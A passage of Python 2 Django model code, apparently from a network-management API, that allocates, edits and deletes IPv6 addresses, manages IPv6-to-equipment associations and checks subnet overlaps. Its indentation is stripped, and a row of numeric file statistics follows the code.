# Find all ipv6s ralated to network
ips = Ipv6.objects.filter(networkipv6__id=cls.networkipv6.id)
for ip in ips:
cls.log.info('ip %s' % ip.block8)
# Cast all to API class
ipsv6 = set([(IPv6Address('%s:%s:%s:%s:%s:%s:%s:%s' % (
ip.block1, ip.block2, ip.block3, ip.block4, ip.block5, ip.block6, ip.block7, ip.block8)
)) for ip in ips])
selected_ip = None
if topdown:
method = net6.iterhostsTopDown
else:
method = net6.iterhosts
# For each ip generated
for ip in method():
# If IP generated was not used
if ip not in ipsv6:
# Use it
selected_ip = ip
return selected_ip.exploded
# Stop generation
break
if selected_ip is None:
raise IpNotAvailableError(
None, u'No IP6 available to NETWORK %s.' % cls.networkipv6.id)
def delete_ip6(self, user, id_ip):
try:
ip = self.get_by_pk(id_ip)
ip.delete()
except IpNotFoundError, e:
raise IpNotFoundError(None, e)
except Exception, e:
self.log.error(u'Failure to delete the IP.')
raise IpError(e, u'Failure to delete the IP')
def edit_ipv6(self, user):
try:
# Cast to API
net6 = IPv6Network('%s:%s:%s:%s:%s:%s:%s:%s/%s' % (self.networkipv6.block1, self.networkipv6.block2, self.networkipv6.block3, self.networkipv6.block4,
self.networkipv6.block5, self.networkipv6.block6, self.networkipv6.block7, self.networkipv6.block8, self.networkipv6.block))
# Find all ipv6s ralated to network
ips = Ipv6.objects.filter(networkipv6__id=self.networkipv6.id)
ip6_object = IPv6Address('%s:%s:%s:%s:%s:%s:%s:%s' % (
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8))
# Cast all to API class
ipsv6 = set([IPv6Address('%s:%s:%s:%s:%s:%s:%s:%s' % (
ip.block1, ip.block2, ip.block3, ip.block4, ip.block5, ip.block6, ip.block7, ip.block8)) for ip in ips])
# Get configuration
conf = Configuration.get()
flag = True
aux_ip6 = ip6_object.exploded
aux_ip6 = aux_ip6.split(':')
self.block1 = aux_ip6[0]
self.block2 = aux_ip6[1]
self.block3 = aux_ip6[2]
self.block4 = aux_ip6[3]
self.block5 = aux_ip6[4]
self.block6 = aux_ip6[5]
self.block7 = aux_ip6[6]
self.block8 = aux_ip6[7]
if ip6_object not in ipsv6:
flag = False
if ip6_object in net6:
# Get configuration
conf = Configuration.get()
first_ip_network = int(net6.network)
bcast_ip_network = int(net6.broadcast)
ipv6_network = int(ip6_object)
if ipv6_network >= (first_ip_network + conf.IPv6_MIN) and ipv6_network < (bcast_ip_network - conf.IPv6_MAX):
flag = True
else:
ip6_aux = self.get_by_blocks_and_net(
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8, self.networkipv6.id)
if self.id != ip6_aux.id:
raise IpNotAvailableError(None, u'Ipv6 %s:%s:%s:%s:%s:%s:%s:%s already on use by network %s.' % (
self.block1, self.block2, self.block3, self.block4, self.block5,
self.block6, self.block7, self.block8, self.networkipv6.id))
if flag:
self.save()
else:
raise IpNotAvailableError(None, u'Ipv6 %s:%s:%s:%s:%s:%s:%s:%s not available for network %s.' % (
self.block1, self.block2, self.block3, self.block4, self.block5,
self.block6, self.block7, self.block8, self.networkipv6.id))
except IpEquipmentAlreadyAssociation, e:
self.log.error(e)
raise IpEquipmentAlreadyAssociation(None, e)
except AddressValueError:
raise InvalidValueError(None, 'ip6', u'%s:%s:%s:%s:%s:%s:%s:%s' % (
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8))
except IpNotAvailableError, e:
raise IpNotAvailableError(None, e.message)
except IpError, e:
self.log.error(
u'Error adding new IPv6 or relationship ip-equipment.')
raise IpError(
e, u'Error adding new IPv6 or relationship ip-equipment.')
def save_ipv6(self, equipment_id, user, net):
try:
already_ip = False
# Cast to API
net6 = IPv6Network('%s:%s:%s:%s:%s:%s:%s:%s/%s' % (net.block1, net.block2, net.block3, net.block4,
net.block5, net.block6, net.block7, net.block8, net.block))
# Find all ipv6s ralated to network
ips = Ipv6.objects.filter(networkipv6__id=net.id)
ip6_object = IPv6Address('%s:%s:%s:%s:%s:%s:%s:%s' % (
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8))
# Cast all to API class
ipsv6 = set([IPv6Address('%s:%s:%s:%s:%s:%s:%s:%s' % (
ip.block1, ip.block2, ip.block3, ip.block4, ip.block5, ip.block6, ip.block7, ip.block8)) for ip in ips])
# Get configuration
# conf = Configuration.get()
flag = False
aux_ip6 = ip6_object.exploded
aux_ip6 = aux_ip6.split(':')
self.block1 = aux_ip6[0]
self.block2 = aux_ip6[1]
self.block3 = aux_ip6[2]
self.block4 = aux_ip6[3]
self.block5 = aux_ip6[4]
self.block6 = aux_ip6[5]
self.block7 = aux_ip6[6]
self.block8 = aux_ip6[7]
# ip6_object = ip6_object.exploded
if ip6_object not in ipsv6:
if ip6_object in net6:
# Get configuration
# conf = Configuration.get()
first_ip_network = int(net6.network)
bcast_ip_network = int(net6.broadcast)
ipv6_network = int(ip6_object)
if ipv6_network >= (first_ip_network) and ipv6_network < (bcast_ip_network):
flag = True
else:
ip_aux = self.get_by_blocks_and_net(
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8, net.id)
try:
Ipv6Equipament.get_by_ip6(ip_aux.id)
raise IpEquipmentAlreadyAssociation(None, u'Ipv6 %s:%s:%s:%s:%s:%s:%s:%s already has association with an Equipament. Try using the association screen for this Ip.' % (
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8))
except IpEquipmentNotFoundError, e:
flag = True
already_ip = True
if flag:
equipment = Equipamento().get_by_pk(equipment_id)
ip6_equipment = Ipv6Equipament()
if not already_ip:
self.networkipv6_id = net.id
self.save()
ip6_equipment.ip = self
else:
ip6_equipment.ip = ip_aux
if self.description is not None and len(self.description) > 0:
ip_aux.description = self.description
ip_aux.save()
ip6_equipment.equipamento = equipment
# # Filter case 2 - Adding new IpEquip for a equip that already have ip in other network with the same range ##
# Get all IpEquipamento related to this equipment
ip_equips = Ipv6Equipament.objects.filter(
equipamento=equipment_id)
for ip_test in [ip_equip.ip for ip_equip in ip_equips]:
if ip_test.networkipv6.block1 == self.networkipv6.block1 and \
ip_test.networkipv6.block2 == self.networkipv6.block2 and \
ip_test.networkipv6.block3 == self.networkipv6.block3 and \
ip_test.networkipv6.block4 == self.networkipv6.block4 and \
ip_test.networkipv6.block5 == self.networkipv6.block5 and \
ip_test.networkipv6.block6 == self.networkipv6.block6 and \
ip_test.networkipv6.block7 == self.networkipv6.block7 and \
ip_test.networkipv6.block8 == self.networkipv6.block8 and \
ip_test.networkipv6.block == self.networkipv6.block and \
ip_test.networkipv6 != self.networkipv6:
# Filter testing
if ip_test.networkipv6.vlan.ambiente.filter is None or self.networkipv6.vlan.ambiente.filter is None:
raise IpRangeAlreadyAssociation(
None, u'Equipment is already associated with another ip with the same ip range.')
else:
# Test both environment's filters
tp_equip_list_one = list()
for fet in FilterEquipType.objects.filter(filter=self.networkipv6.vlan.ambiente.filter.id):
tp_equip_list_one.append(fet.equiptype)
tp_equip_list_two = list()
for fet in FilterEquipType.objects.filter(filter=ip_test.networkipv6.vlan.ambiente.filter.id):
tp_equip_list_two.append(fet.equiptype)
if equipment.tipo_equipamento not in tp_equip_list_one or equipment.tipo_equipamento not in tp_equip_list_two:
raise IpRangeAlreadyAssociation(
None, u'Equipment is already associated with another ip with the same ip range.')
# # Filter case 2 - end ##
ip6_equipment.save()
# Makes Environment Equipment association
try:
equipment_environment = EquipamentoAmbiente()
equipment_environment.equipamento = equipment
equipment_environment.ambiente = net.vlan.ambiente
equipment_environment.create(user)
except EquipamentoAmbienteDuplicatedError, e:
# If already exists, OK !
pass
else:
raise IpNotAvailableError(None, u'Ipv6 %s:%s:%s:%s:%s:%s:%s:%s not available for network %s.' % (
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8, net.id))
except IpRangeAlreadyAssociation, e:
raise IpRangeAlreadyAssociation(None, e.message)
except IpEquipmentAlreadyAssociation, e:
raise IpEquipmentAlreadyAssociation(None, e.message)
except AddressValueError:
raise InvalidValueError(None, 'ip6', u'%s:%s:%s:%s:%s:%s:%s:%s' % (
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8))
except IpNotAvailableError, e:
raise IpNotAvailableError(None, u'Ipv6 %s:%s:%s:%s:%s:%s:%s:%s not available for network %s.' % (
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8, net.id))
except IpError, e:
self.log.error(
u'Error adding new IPv6 or relationship ip-equipment.')
raise IpError(
e, u'Error adding new IPv6 or relationship ip-equipment.')
def create(self, authenticated_user, equipment_id, id):
"""Persist an IPv6 and associate it to an equipment.
If equipment was not related with VLAN environment, this makes the relationship
@return: Nothing
@raise NetworkIPv6NotFoundError: NetworkIPv6 does not exist.
@raise NetworkIPv6Error: Error finding NetworkIPv6.
@raise EquipamentoNotFoundError: Equipment does not exist.
@raise EquipamentoError: Error finding Equipment.
@raise IpNotAvailableError: No IP available to VLAN.
@raise IpError: Error persisting in database.
"""
self.networkipv6 = NetworkIPv6().get_by_pk(id)
# Cast to API
net6 = IPv6Network('%s:%s:%s:%s:%s:%s:%s:%s/%s' % (
self.networkipv6.block1, self.networkipv6.block2, self.networkipv6.block3, self.networkipv6.block4,
self.networkipv6.block5, self.networkipv6.block6, self.networkipv6.block7, self.networkipv6.block8, self.networkipv6.block))
# Find all ipv6s ralated to network
ips = Ipv6.objects.filter(networkipv6__id=self.networkipv6.id)
# Cast all to API class
ipsv6 = set([(IPv6Address('%s:%s:%s:%s:%s:%s:%s:%s' % (
ip.block1, ip.block2, ip.block3, ip.block4, ip.block5, ip.block6, ip.block7, ip.block8))) for ip in ips])
# Get configuration
conf = Configuration.get()
selected_ip = None
# For each ip generated
i = 0
for ip in net6.iterhosts():
# Do not use some range of IPs (config)
i = i + 1
if i >= conf.IPv6_MIN and i < (net6.numhosts - conf.IPv6_MAX):
# If IP generated was not used
if ip not in ipsv6:
# Use it
selected_ip = ip
# Stop generation
break
if selected_ip is None:
raise IpNotAvailableError(
None, u'No IPv6 available to VLAN %s.' % self.networkipv6.vlan.num_vlan)
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8 = str(
selected_ip.exploded).split(':')
equipment = Equipamento().get_by_pk(equipment_id)
try:
self.save()
ipv6_equipment = Ipv6Equipament()
ipv6_equipment.ip = self
ipv6_equipment.equipamento = equipment
ipv6_equipment.save(authenticated_user)
try:
equipment_environment = EquipamentoAmbiente().get_by_equipment_environment(
equipment_id, self.networkipv6.vlan.ambiente_id)
except EquipamentoAmbienteNotFoundError:
equipment_environment = EquipamentoAmbiente()
equipment_environment.equipamento = equipment
equipment_environment.ambiente = self.networkipv6.vlan.ambiente
equipment_environment.save(authenticated_user)
except Exception, e:
self.log.error(
u'Error adding new IPv6 or relationship ip-equipment.')
raise IpError(
e, u'Error adding new IPv6 or relationship ip-equipment.')
@classmethod
def get_by_blocks_and_net(cls, block1, block2, block3, block4, block5, block6, block7, block8, id_network):
"""Get Ipv6 by blocks and network.
@return: Ipv6.
@raise IpNotFoundError: Ipv6 is not registered.
@raise IpError: Failed to search for the Ipv6.
"""
try:
return Ipv6.objects.get(
block1=block1, block2=block2, block3=block3, block4=block4, block5=block5,
block6=block6, block7=block7, block8=block8, networkipv6=id_network)
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'Dont there is a Ipv6 %s:%s:%s:%s:%s:%s:%s:%s ' % (
block1, block2, block3, block4, block5, block6, block7, block8))
except Exception, e:
cls.log.error(u'Failure to search the Ipv6.')
raise IpError(e, u'Failure to search the Ipv6.')
@classmethod
def get_by_blocks(cls, block1, block2, block3, block4, block5, block6, block7, block8):
"""Get Ipv6's by blocks.
@return: Ipv6's.
@raise IpNotFoundError: Ipv6 is not registered.
@raise IpError: Failed to search for the Ipv6.
"""
try:
ips = Ipv6.objects.filter(block1=block1, block2=block2, block3=block3,
block4=block4, block5=block5, block6=block6, block7=block7, block8=block8)
if len(ips) == 0:
raise ObjectDoesNotExist()
return ips
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'Dont there is a Ipv6 %s:%s:%s:%s:%s:%s:%s:%s ' % (
block1, block2, block3, block4, block5, block6, block7, block8))
except Exception, e:
cls.log.error(u'Failure to search the Ipv6.')
raise IpError(e, u'Failure to search the Ipv6.')
@classmethod
def get_by_octs_and_environment_vip(cls, block1, block2, block3, block4, block5,
block6, block7, block8, id_evip, valid=True):
"""Get Ipv6 by blocks and environment vip.
@return: Ipv6.
@raise IpNotFoundError: Ipv6 is not registered.
@raise IpError: Failed to search for the Ipv6.
"""
try:
ips = Ipv6.objects.filter(
block1=block1, block2=block2, block3=block3,
block4=block4, block5=block5, block6=block6, block7=block7, block8=block8)
if ips.count() == 0:
raise IpNotFoundError(None)
if valid is True:
return Ipv6.objects.get(
block1=block1, block2=block2, block3=block3, block4=block4, block5=block5,
block6=block6, block7=block7, block8=block8, networkipv6__ambient_vip__id=id_evip)
else:
for ip in ips:
if ip.networkipv6.ambient_vip:
if ip.networkipv6.ambient_vip.id == id_evip:
return ip
else:
environments = Ambiente.objects.filter(
vlan__networkipv6__ambient_vip__id=id_evip)
for env in environments:
if ip.networkipv6.vlan.ambiente.divisao_dc.id == env.divisao_dc.id \
and ip.networkipv6.vlan.ambiente.ambiente_logico.id == env.ambiente_logico.id:
return ip
raise ObjectDoesNotExist()
except ObjectDoesNotExist, e:
evip = EnvironmentVip.get_by_pk(id_evip)
msg = u'Ipv6 não está relacionado ao Ambiente Vip: %s.' % evip.show_environment_vip()
cls.log.error(msg)
raise IpNotFoundByEquipAndVipError(e, msg)
except IpNotFoundError, e:
msg = u'Ipv6 "%s.%s.%s.%s.%s.%s.%s.%s" não existe.' % (
block1, block2, block3, block4, block5, block6, block7, block8)
cls.log.error(msg)
raise IpNotFoundError(e, msg)
except Exception, e:
cls.log.error(u'Failure to search the Ipv6.')
raise IpError(e, u'Failure to search the Ipv6.')
@classmethod
def get_by_octs_and_environment(cls, block1, block2, block3, block4, block5,
block6, block7, block8, id_environment):
"""Get Ipv6 by blocks and environment.
@return: Ipv6.
@raise IpNotFoundError: Ipv6 is not registered.
@raise IpError: Failed to search for the Ipv6.
"""
try:
return Ipv6.objects.get(
block1=block1, block2=block2, block3=block3, block4=block4, block5=block5,
block6=block6, block7=block7, block8=block8, networkipv6__vlan__ambiente__id=id_environment)
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'Dont there is a IPv6 %s:%s:%s:%s:%s:%s:%s:%s of the environment %s.' % (
block1, block2, block3, block4, block5, block6, block7, block8, id_environment))
except Exception, e:
cls.log.error(u'Failure to search the Ipv6.')
raise IpError(e, u'Failure to search the Ipv6.')
def delete(self):
"""Sobrescreve o método do Django para remover um IP.
Antes de remover o IP remove todas as suas requisições de VIP e os relacionamentos com equipamentos.
"""
try:
# Delete all Request Vip associeted
for r in self.requisicaovips_set.all():
r_alter = False
id_vip = r.id
if r.vip_criado:
raise IpCantBeRemovedFromVip(
r.id, 'Ipv6 não pode ser removido, porque está em uso por Requisição Vip %s' % (r.id))
else:
if r.ip is not None:
r.ipv6 = None
r.validado = 0
r.save()
r_alter = True
# SYNC_VIP
syncs.old_to_new(r)
if not r_alter:
r.delete()
# SYNC_VIP
syncs.delete_new(id_vip)
# Delete all EquipmentIp and EnviromentEquip associated
for ie in self.ipv6equipament_set.all():
# Codigo removido, pois não devemos remover o ambiente do equipamento mesmo que não tenha IP
# para o ambiente solicidado pelo Henrique
# ambienteequip = EquipamentoAmbiente()
# ambienteequip = ambienteequip.get_by_equipment_environment(
# ie.equipamento.id, self.networkipv6.vlan.ambiente_id)
#
# ips = Ip.list_by_environment_and_equipment(
# ambienteequip.ambiente_id, ie.equipamento.id)
# ips6 = Ipv6.list_by_environment_and_equipment(
# ambienteequip.ambiente_id, ie.equipamento.id)
#
# if len(ips) <= 0 and len(ips6) <= 1:
#
# ambienteequip.delete()
ie.delete()
# Serializes obj
ip_slz = get_app('api_ip', module_label='serializers')
serializer = ip_slz.Ipv6V3Serializer(self)
data_to_queue = serializer.data
# Deletes Obj IP
super(Ipv6, self).delete()
# Sends to Queue
queue_manager = QueueManager()
data_to_queue.update({'description': queue_keys.IPv6_REMOVE})
queue_manager.append({
'action': queue_keys.IPv6_REMOVE,
'kind': queue_keys.IPv6_KEY,
'data': data_to_queue
})
queue_manager.send()
except EquipamentoAmbienteNotFoundError, e:
raise EquipamentoAmbienteNotFoundError(None, e.message)
except IpCantBeRemovedFromVip, e:
raise IpCantBeRemovedFromVip(e.cause, e.message)
except IpEquipmentNotFoundError, e:
raise IpEquipmentNotFoundError(None, e.message)
def delete_v3(self):
"""
Method V3 to remove Ipv6.
Before removing the IP removes all your requests
VIP and relationships with equipment.
@raise IpCantBeRemovedFromVip: Ipv6 is associated with created
Vip Request.
"""
try:
for vip in self.viprequest_set.all():
id_vip = vip.id
with distributedlock(LOCK_VIP % id_vip):
if vip.created:
raise IpCantBeRemovedFromVip(
id_vip,
'IPv6 can not be removed because it is '
'in use by Vip Request %s' % (id_vip))
# Deletes only VIP, Related Ipv6 with VIP is not removed
vip.delete_v3(bypass_ipv4=True, bypass_ipv6=True)
# Deletes Related Equipment
for ip_eqpt in self.ipv6equipament_set.all():
ip_eqpt.delete_v3()
# Serializes obj
ip_slz = get_app('api_ip', module_label='serializers')
serializer = ip_slz.Ipv6V3Serializer(self)
data_to_queue = serializer.data
# Deletes Obj IP
super(Ip, self).delete()
# Sends to Queue
queue_manager = QueueManager()
data_to_queue.update({'description': queue_keys.IPv6_REMOVE})
queue_manager.append({
'action': queue_keys.IPv6_REMOVE,
'kind': queue_keys.IPv6_KEY,
'data': data_to_queue
})
queue_manager.send()
except IpCantBeRemovedFromVip, e:
raise IpCantBeRemovedFromVip(e.cause, e.message)
class Ipv6Equipament(BaseModel):
id = models.AutoField(
primary_key=True,
db_column='id_ipsv6_dos_equipamentos'
)
ip = models.ForeignKey(
'ip.Ipv6',
db_column='id_ipv6'
)
equipamento = models.ForeignKey(
'equipamento.Equipamento',
db_column='id_equip'
)
log = logging.getLogger('Ipv6Equipament')
class Meta(BaseModel.Meta):
db_table = u'ipsv6_dos_equipamentos'
managed = True
unique_together = ('ip', 'equipamento')
@classmethod
def list_by_equip(cls, equip_id):
"""Get IP6 by id_ip
@return: IPEquipment.
@raise IpEquipmentNotFoundError: IP6 is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return Ipv6Equipament.objects.filter(equipamento__id=equip_id)
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'Dont there is a IP-Equipament by Equip = %s.')
except Exception, e:
cls.log.error(u'Failure to search the Ip-Equipament.')
raise IpError(e, u'Failure to search the Ip-Equipament.')
@classmethod
def get_by_ip6(cls, ip6_id):
"""Get IP6 by id_ip6
@return: IP6.
@raise IpEquipmentNotFoundError: IP6 is not registered.
@raise IpError: Failed to search for the I6P.
"""
try:
return Ipv6Equipament.objects.filter(ip__id=ip6_id).uniqueResult()
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'Dont there is a IP-Equipament by IP = %s.')
except Exception, e:
cls.log.error(u'Failure to search the Ip-Equipament.')
raise IpError(e, u'Failure to search the Ip-Equipament.')
@classmethod
def list_by_ip6(cls, ip6_id):
"""Get IP6 by id_ip6
@return: IP6.
@raise IpEquipmentNotFoundError: IP6 is not registered.
@raise IpError: Failed to search for the I6P.
"""
try:
return Ipv6Equipament.objects.filter(ip__id=ip6_id)
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'Dont there is a IP-Equipament by IP = %s.')
except Exception, e:
cls.log.error(u'Failure to search the Ip-Equipament.')
raise IpError(e, u'Failure to search the Ip-Equipament.')
@classmethod
def get_by_ip_equipment(cls, ip_id, equip_id):
"""Get Ipv6Equipament by ip_id and equip_id.
@return: Ipv6Equipament.
@raise IpEquipmentNotFoundError: Ipv6Equipament is not registered.
@raise IpError: Failed to search for the Ipv6Equipament.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return Ipv6Equipament.objects.filter(ip__id=ip_id, equipamento__id=equip_id).uniqueResult()
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'Dont there is a Ipv6Equipament by ip_id = %s and equip_id = %s' % (ip_id, equip_id))
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the Ipv6Equipament.')
raise IpError(e, u'Failure to search the Ipv6Equipament.')
def validate_ip(self):
""" Validates whether IPv6 is already associated with equipment
@raise IpEquipamentoDuplicatedError: if IPv6 is already associated with equipment
"""
try:
Ipv6Equipament.objects.get(
ip=self.ip, equipamento=self.equipamento)
raise IpEquipamentoDuplicatedError(
None, u'IP already registered for the equipment.')
except ObjectDoesNotExist:
pass
def create(self, authenticated_user, ip_id, equipment_id):
"""Insere um relacionamento entre IP e Equipamento.
@return: Nothing.
@raise IpError: Falha ao inserir.
@raise EquipamentoNotFoundError: Equipamento não cadastrado.
@raise IpNotFoundError: Ip não cadastrado.
@raise IpEquipamentoDuplicatedError: IP já cadastrado para o equipamento.
@raise EquipamentoError: Falha ao pesquisar o equipamento.
"""
self.equipamento = Equipamento().get_by_pk(equipment_id)
self.ip = Ipv6().get_by_pk(ip_id)
# Valida o ip
self.validate_ip()
try:
if self.equipamento not in [ea.equipamento for ea in self.ip.networkipv6.vlan.ambiente.equipamentoambiente_set.all()]:
ea = EquipamentoAmbiente(
ambiente=self.ip.networkipv6.vlan.ambiente, equipamento=self.equipamento)
ea.save(authenticated_user)
self.save()
except Exception, e:
self.log.error(u'Falha ao inserir um ip_equipamento.')
raise IpError(e, u'Falha ao inserir um ip_equipamento.')
def remove(self, authenticated_user, ip_id, equip_id):
"""Research and removes the relationship between IP and equipment.
@return: Nothing
@raise IpEquipmentNotFoundError: Dont is no relationship between the IP and Equipment.
@raise IpError: Failure to remove the relationship.
"""
ip_equipamento = self.get_by_ip_equipment(ip_id, equip_id)
try:
ip_equipamento.delete()
except (IpCantBeRemovedFromVip, IpEquipCantDissociateFromVip), e:
raise e
except Exception, e:
self.log.error(u'Failure to remove the Ipv6Equipament.')
raise IpError(e, u'Failure to remove the Ipv6Equipament.')
def delete(self):
"""Override Django's method to remove Ipv6 and Equipment relationship.
If Ip from this Ip-Equipment is associated with created Vip Request, and the Equipment
is the last balancer associated, the IpEquipment association cannot be removed.
If Ip has no relationship with other Equipments, then Ip is also removed.
"""
for r in self.ip.requisicaovips_set.all():
if self.equipamento.tipo_equipamento == TipoEquipamento.get_tipo_balanceador():
# Get all equipments (except the one being removed) related to ip
# to find another balancer
other_equips = self.ip.ipv6equipament_set.exclude(
equipamento=self.equipamento.id)
another_balancer = False
for ipequip in other_equips:
if ipequip.equipamento.tipo_equipamento == TipoEquipamento.get_tipo_balanceador():
another_balancer = True
break
if not another_balancer:
if r.vip_criado:
raise IpEquipCantDissociateFromVip(
{
'vip_id': r.id,
'ip': mount_ipv6_string(self.ip),
'equip_name': self.equipamento.nome
}, 'Ipv6 não pode ser disassociado do equipamento %s '
'porque é o último balanceador da Requisição Vip %s.' %
(self.equipamento.nome, r.id))
else:
# Remove ip from vip or remove vip
id_vip = r.id
if r.ip is not None:
r.ipv6 = None
r.validado = 0
r.save()
# SYNC_VIP
syncs.old_to_new(r)
else:
r.delete()
# SYNC_VIP
syncs.delete_new(id_vip)
if self.ip.serverpoolmember_set.count() > 0:
server_pool_identifiers = set()
for svm in self.ip.serverpoolmember_set.all():
item = '{}:{}'.format(svm.server_pool.id,
svm.server_pool.identifier)
server_pool_identifiers.add(item)
server_pool_identifiers = list(server_pool_identifiers)
server_pool_identifiers = ', '.join(
str(server_pool) for server_pool in server_pool_identifiers)
raise IpCantRemoveFromServerPool(
{
'ip': mount_ipv6_string(self.ip),
'equip_name': self.equipamento.nome,
'server_pool_identifiers': server_pool_identifiers
},
'Ipv6 não pode ser disassociado do equipamento %s '
'porque ele está sendo utilizando nos Server Pools '
'(id:identifier) %s' % (
self.equipamento.nome, server_pool_identifiers)
)
super(Ipv6Equipament, self).delete()
# If ip has no other equipment, than he will be removed to
if self.ip.ipv6equipament_set.count() == 0:
self.ip.delete()
def delete_v3(self):
"""
Method V3 to remove Ipv6 and Equipment relationship.
If Ipv6 from this Ipv6-Equipment is associated with created Vip
Request and the Equipment is the last balancer associated,
the IpEquipment association cannot be removed.
If Ipv6 has no relationship with other Equipments, then Ipv6 is
also removed.
@raise IpCantRemoveFromServerPool: Ip is associated with associated
Pool Member.
@raise IpEquipCantDissociateFromVip: Equipment is the last balanced
in a created Vip Request
pointing to ip.
"""
type_eqpt = TipoEquipamento.get_tipo_balanceador()
if self.equipamento.tipo_equipamento == type_eqpt:
for vip in self.ip.viprequest_set.all():
# Filter equipments to find another balancer
another_balancer = self.ip.ipv6equipament_set.exclude(
equipamento=self.equipamento.id
).filter(equipamento__tipo_equipamento=type_eqpt)
id_vip = vip.id
if not another_balancer:
with distributedlock(LOCK_VIP % id_vip):
if vip.created:
raise IpEquipCantDissociateFromVip(
{
'vip_id': id_vip,
'ip': self.ip.ip_formated,
'equip_name': self.equipamento.nome
},
'Ipv6 can not be dissociated from the '
'equipment %s because it is the last '
'balancer of Vip Request %s.'
% (self.equipamento.nome, id_vip)
)
else:
# Remove ipv6 from vip
if vip.ipv4 is not None:
vip.ipv6 = None
id_vip.save()
# SYNC_VIP
syncs.new_to_old(vip)
# Remove vip
else:
vip.delete_v3(bypass_ipv4=True,
bypass_ipv6=True)
if self.ip.serverpoolmember_set.count() > 0:
items = ['{}:{}'.format(
svm.server_pool.id,
svm.server_pool.identifier
) for svm in self.ip.serverpoolmember_set.all()]
items = ', '.join(items)
raise IpCantRemoveFromServerPool(
{
'ip': self.ip.ip_formated,
'equip_name': self.equipamento.nome,
'server_pool_identifiers': items
},
'IPv6 can not be dissociated from the equipment% s because it'
'is being using in the Server Pools (id: identifier)%s' %
(self.equipamento.nome, items)
)
super(Ipv6Equipament, self).delete()
# If ip has no other equipment, than he will be removed to
if self.ip.ipv6equipament_set.count() == 0:
self.ip.delete_v3()
def create_v3(self, ip_equipment):
"""Inserts a relationship between IP e Equipment.
@return: Nothing.
@raise IpError: Failure to insert.
@raise EquipamentoNotFoundError: Equipment do not registered.
@raise IpNotFoundError: Ip do not registered.
@raise IpEquipamentoDuplicatedError: IP already registered for the equipment.
@raise EquipamentoError: Failure to search equipment.
"""
self.equipamento = Equipamento().get_by_pk(ip_equipment.get('equipment'))
self.ip = Ipv6().get_by_pk(ip_equipment.get('ip'))
# Validate the ip
self.__validate_ip()
try:
# All equipments related with environment of IP
eqpts = self.ip.networkipv6.vlan.ambiente\
.equipamentoambiente_set.all()\
.values_list('equipamento', flat=True)
if ip_equipment.get('equipment') not in eqpts:
ea = EquipamentoAmbiente(
ambiente=self.ip.networkipv6.vlan.ambiente,
equipamento=self.equipamento
)
ea.save()
self.save()
except Exception, e:
self.log.error(u'Failure to insert an ip_equipamento.')
raise IpError(e, u'Failure to insert an ip_equipamento.')
def network_in_range(vlan, network, version):
# Get all vlans environments from equipments of the current
# environment
equips = list()
envs = list()
envs_aux = list()
ids_all = list()
ambiente = vlan.ambiente
filter = ambiente.filter
equipment_types = TipoEquipamento.objects.filter(
filterequiptype__filter=filter)
# Get all equipments from the environment being tested
# that are not supposed to be filtered
# (not the same type of the equipment type of a filter of the environment)
for env in ambiente.equipamentoambiente_set.all().exclude(
equipamento__tipo_equipamento__in=equipment_types
).select_related('equipamento'):
equips.append(env.equipamento)
# Get all environment that the equipments above are included
for equip in equips:
for env in equip.equipamentoambiente_set.all().select_related('ambiente'):
if env.ambiente_id not in envs_aux:
envs.append(env.ambiente)
envs_aux.append(env.ambiente_id)
# Check in all vlans from all environments above
# if there is a network that is sub or super network of the current
# network being tested
for env in envs:
for vlan in env.vlan_set.all().prefetch_related(
'networkipv4_set'
).prefetch_related('networkipv6_set'):
ids_all.append(vlan.id)
is_subnet = verify_subnet(vlan, network, version)
if is_subnet:
return False
return True
def verify_subnet(vlan, network, version):
from networkapi.infrastructure.ipaddr import IPNetwork
if version == IP_VERSION.IPv4[0]:
vlan_net = vlan.networkipv4_set.all()
else:
vlan_net = vlan.networkipv6_set.all()
# One vlan may have many networks, iterate over it
for net in vlan_net:
if version == IP_VERSION.IPv4[0]:
ip = '%s.%s.%s.%s/%s' % (net.oct1,
net.oct2, net.oct3, net.oct4, net.block)
else:
ip = '%s:%s:%s:%s:%s:%s:%s:%s/%d' % (
net.block1, net.block2, net.block3, net.block4,
net.block5, net.block6, net.block7, net.block8, net.block)
ip_net = IPNetwork(ip)
# If some network, inside this vlan, is subnet of network search param
if ip_net in network or network in ip_net:
# This vlan must be in vlans founded, don't need to continue
# checking
return True
# If don't found any subnet return False
return False
| 38.742148 | 216 | 0.568982 | 17,348 | 159,114 | 5.078049 | 0.041042 | 0.006357 | 0.007696 | 0.008037 | 0.857391 | 0.834699 | 0.808137 | 0.79061 | 0.773435 | 0.760018 | 0 | 0.020681 | 0.345413 | 159,114 | 4,106 | 217 | 38.751583 | 0.825124 | 0.086202 | 0 | 0.718938 | 0 | 0.004825 | 0.111519 | 0.009571 | 0 | 0 | 0 | 0.000731 | 0 | 0 | null | null | 0.004825 | 0.012465 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
